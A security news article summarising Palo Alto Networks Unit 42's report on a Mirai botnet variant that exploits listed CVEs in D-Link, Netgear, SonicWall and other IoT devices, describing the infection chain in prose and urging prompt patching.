Palo Alto Networks’ Unit 42 reports a new Mirai variant that is targeting known flaws in D-Link, Netgear, and SonicWall devices, and yet to be discovered flaws in various internet-of-things (IoT) gadgets.
The new variant has been detected targeting six known vulnerabilities and three previously unknown ones, to infect systems and involve in a botnet.
The campaign is still active at the time of this writing, said Palo Alto researchers on Monday.
“Upon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers,” experts explain.
Attackers exploited the following six known vulnerabilities: a SonicWall SSL-VPN exploit; Yealink Device Management remote code-execution (RCE) flaws (CVE-2021-27561 and CVE-2021-27562); a D-Link DNS-320 firewall exploit (CVE-2020-25506); an RCE flaw in Micro Focus Operation Bridge Reporter (CVE-2021-22502); a Netgear ProSAFE Plus RCE flaw (CVE-2020-26919); and a Netis WF2419 wireless router exploit (CVE-2019-19356).
Researchers also mention the attackers are targeting flaws in IoT devices that had not been previously identified.
“We cannot say with certainty what the targeted devices are for the unidentified exploits,” Zhibin Zhang, principal researcher for Unit 42, told Threatpost. “However, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.”
The researchers say the first two exploits are abused in RCE attacks. One exploit is targeting a command-injection vulnerability in certain components. Another one is targeting the Common Gateway Interface (CGI) login script. In this latter case, the flaw stems from a key parameter that is not properly sanitized. The third exploit targets the op_type parameter, which is not properly sanitized, too, which leads to command injection.
After the initial stage, the malware invokes the wget utility to download a malicious shell script that then downloads several Mirai binaries (lolol.sh and dark.[arch]) and executes them.
The variant in focus is the latest of more than 60 variants of malware based on Mirai’s source code that are behind an array of attacks. For example, last year, a Mirai variant targeted Zyxel network-attached storage (NAS) devices, security researchers say. In 2019, a variant of the botnet was found targeting flaws in enterprise wireless presentation and display systems. And, in 2018, a variant was used in DDoS campaigns against financial-sector businesses.
Researchers reminded that connected devices continue to pose a serious security problem for users and strongly advised customers to apply patches as soon as they are released by manufacturers.
“The IoT realm remains an easily accessible target for attackers,” Unit 42 researchers said. “Many vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences.”